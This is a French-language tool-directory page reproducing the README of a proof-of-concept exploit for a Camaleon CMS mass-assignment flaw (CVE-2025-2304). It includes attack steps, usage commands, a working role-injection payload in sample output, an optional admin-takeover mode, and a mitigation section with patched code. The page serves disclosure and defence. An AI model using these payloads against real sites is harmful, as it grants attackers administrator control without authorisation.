Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2304-POC — Preuve de concept pour CVE-2025-2304 — escalade de privilèges critique (CVSS 9.4) par assignation en masse dans Camaleon CMS. | Kitploit
Outils/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Escalade de PrivilègesGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Preuve de concept pour CVE-2025-2304 — escalade de privilèges critique (CVSS 9.4) par assignation en masse dans Camaleon CMS.

Voir le dépôt
1033il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-2304 PoC - Élévation de privilèges dans Camaleon CMS

CVE CVSS Python License

A Proof of Concept (PoC) exploit for CVE-2025-2304, a critical mass assignment vulnerability in Camaleon CMS that allows privilege escalation from low-privileged users to administrators.

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Fonctionnalités
  • Installation
  • Utilisation
  • Exemples
  • Versions affectées
  • Atténuation
  • Avertissement
  • Références
  • Auteur

🔍 Aperçu

CVE-2025-2304 est une vulnérabilité critique d'assignation de masse dans Camaleon CMS, présente dans la méthode updated_ajax du UsersController. Cette vulnérabilité provient de l'utilisation de la méthode dangereuse permit! dans Rails, qui permet à tous les paramètres de passer sans aucun filtrage.

Ce PoC démontre comment un utilisateur authentifié avec des privilèges faibles peut devenir administrateur en injectant des paramètres non autorisés lors des opérations de changement de mot de passe.

Score CVSS : 9.4 (Critique)

🐛 Détails de la vulnérabilité

Cause racine

Le code vulnérable utilise params.require(:user).permit! qui accepte tous les paramètres fournis par l'utilisateur sans validation :

root@kitploit:~
def updated_ajax
  user_params = params.require(:user).permit!  # DANGEREUX !
  current_user.update(user_params)
end

Exploitation

Un attaquant peut injecter des paramètres supplémentaires comme user[role]=admin à côté des champs légitimes de changement de mot de passe, ce qui amène l'application à mettre à jour le rôle de l'utilisateur en administrateur.

Vecteur d'attaque :

  1. S'authentifier en tant qu'utilisateur à faibles privilèges (ex. rôle "client")
  2. Envoyer une requête POST malveillante vers /admin/users/{id}/updated_ajax
  3. Injecter le paramètre user[role]=admin
  4. Le rôle de l'utilisateur passe à administrateur

✨ Fonctionnalités

  • ✅ Test sécurisé : Préserve le mot de passe utilisateur pendant l'exploitation
  • ✅ Plusieurs charges utiles : Teste 7+ techniques d'injection différentes
  • ✅ Détection de version : Détecte automatiquement les versions CMS vulnérables
  • ✅ Option non destructive : Option --no-password-field pour le test le plus sûr
  • ✅ Support proxy : S'intègre avec Burp Suite/ZAP pour l'analyse manuelle
  • ✅ Mode verbeux : Sortie détaillée pour le débogage
  • ✅ Prise de contrôle admin : Attaque optionnelle de réinitialisation du mot de passe admin
  • ✅ Sortie colorée : Indicateurs visuels clairs pour succès/échec

📦 Installation

Prérequis

  • Python 3.7+
  • pip (gestionnaire de paquets Python)

Cloner le dépôt

root@kitploit:~
git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Installer les dépendances

root@kitploit:~
pip install -r requirements.txt

Ou installer manuellement :

root@kitploit:~
pip install requests beautifulsoup4

🚀 Utilisation

Syntaxe de base

root@kitploit:~
python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Options en ligne de commande

root@kitploit:~
arguments positionnels :
  target                URL cible (ex. http://target.com)

arguments requis :
  -u, --username        Nom d'utilisateur existant pour l'authentification
  -p, --password        Mot de passe utilisateur

arguments optionnels :
  -h, --help            Afficher l'aide et quitter
  -v, --verbose         Sortie verbeuse (afficher toutes les requêtes)
  --proxy PROXY         Proxy HTTP pour inspection du trafic (ex. http://127.0.0.1:8080)
  --no-password-field   Tester l'exploitation sans champs de mot de passe (le plus sûr)
  --skip-admin-test     Ignorer le test destructeur de réinitialisation du mot de passe admin

📚 Exemples

Test standard (Recommandé)

Testez avec des identifiants utilisateur existants tout en préservant le mot de passe :

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Test le plus sûr (sans champs de mot de passe)

Testez sans inclure les champs de mot de passe dans la charge utile :

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Avec proxy Burp Suite

Acheminez le trafic via Burp Suite pour une inspection manuelle :

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Mode verbeux

Activez la sortie détaillée montrant toutes les requêtes et réponses :

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Ignorer les tests destructeurs

Testez uniquement l'élévation de privilèges, ignorez la réinitialisation du mot de passe admin :

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Exemple de sortie

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Cible : http://target.com
[*] Nom d'utilisateur : testuser
[*] Mot de passe : **********

[*] Connexion en tant que testuser...
[+] Connexion réussie

[*] Vérification de la version CMS...
[*] Version détectée : 2.9.0
[+] Version VULNÉRABLE (< 2.9.1)

============================================================
[*] Test de la vulnérabilité d'assignation de masse CVE-2025-2304
============================================================

[*] Utilisateur cible : testuser (ID : 7)
[*] Rôle actuel : Client (client)
[*] Le mot de passe restera inchangé

[1/7] Test : point de terminaison AJAX - user[role]
    ✗ Échec
[2/7] Test : point de terminaison AJAX - password[role]
============================================================
[+] EXPLOITATION RÉUSSIE !
============================================================
[+] Élévation de privilèges : Client → Administrateur
[+] Point de terminaison vulnérable : /admin/users/7/updated_ajax
[+] Charge utile fonctionnelle : {'password[role]': 'admin'}
[+] Mot de passe inchangé : l'utilisateur peut toujours se connecter normalement
[+] CVE-2025-2304 CONFIRMÉE !

[✓] VULNÉRABILITÉ CVE-2025-2304 CONFIRMÉE

🎯 Versions affectées

VersionStatut
< 2.9.1❌ Vulnérable
≥ 2.9.1✅ Corrigé

Particulièrement vulnérables :

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x et versions antérieures

🛡️ Atténuation

Actions immédiates

  1. Mettre à jour vers la version 2.9.1 ou ultérieure

    root@kitploit:~
    gem update camaleon_cms
    
  2. Auditer les comptes utilisateurs

    • Vérifier les changements de privilèges inattendus
    • Examiner les journaux de modification de rôles
    • Rechercher des requêtes POST suspectes vers /users/*/updated_ajax
  3. Forcer les réinitialisations de mot de passe (si compromis)

    • Réinitialiser les mots de passe de tous les comptes à privilèges
    • Invalider les sessions existantes

Prévention à long terme

Modèle de code sécurisé :

Remplacez le dangereux permit! par une liste blanche explicite :

root@kitploit:~
# Avant (VULNÉRABLE)
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end

# Après (SÉCURISÉ)
def updated_ajax
  user_params = params.require(:user).permit(:password, :password_confirmation)
  current_user.update(user_params)
end

Mesures de sécurité supplémentaires :

  • Implémenter un filtrage strict des paramètres dans toute l'application
  • Ajouter des workflows d'approbation pour les changements de rôle
  • Activer la journalisation d'audit pour les changements de privilèges
  • Utiliser le principe du moindre privilège
  • Surveiller les tentatives d'assignation de masse via les règles WAF

⚠️ Avertissement

Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.

Avis légal :

  • N'utilisez cet outil que sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite
  • L'accès non autorisé aux systèmes informatiques est illégal en vertu de lois telles que :
    • Computer Fraud and Abuse Act (CFAA) aux États-Unis
    • Computer Misuse Act 1990 au Royaume-Uni
    • Législation similaire dans d'autres juridictions
  • L'auteur décline TOUTE responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil
  • Les utilisateurs sont seuls responsables de leurs actions

Utilisation éthique :

  • Obtenez une autorisation appropriée avant de tester
  • Suivez les pratiques de divulgation responsable
  • Utilisez dans le cadre de tests d'intrusion avec approbation de périmètre
  • À des fins éducatives uniquement dans des environnements de laboratoire contrôlés

📖 Références

  • Entrée CVE : CVE-2025-2304
  • Avis GHSA : GHSA-rp28-mvq3-wf8j
  • Avis du fournisseur : Tenable Security Research TRA-2025-09
  • Commit de correctif : GitHub Commit 179fd6b
  • Notes de version : Camaleon CMS 2.9.1

👤 Auteur

d3vn0mi

  • GitHub: @d3vn0mi
  • Site personnel : @d3vn0mi
  • Blog personnel : @d3vn0mi

📝 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

🤝 Contribution

Les contributions, les problèmes et les demandes de fonctionnalités sont les bienvenus !

N'hésitez pas à consulter la page des problèmes.

⭐ Montrez votre soutien

Donnez une ⭐ si ce projet vous a aidé !


Remarque : Ce dépôt est destiné à la recherche en sécurité et à des fins éducatives. Pratiquez toujours la divulgation responsable et obtenez une autorisation appropriée avant de tester.

Télécharger l’outil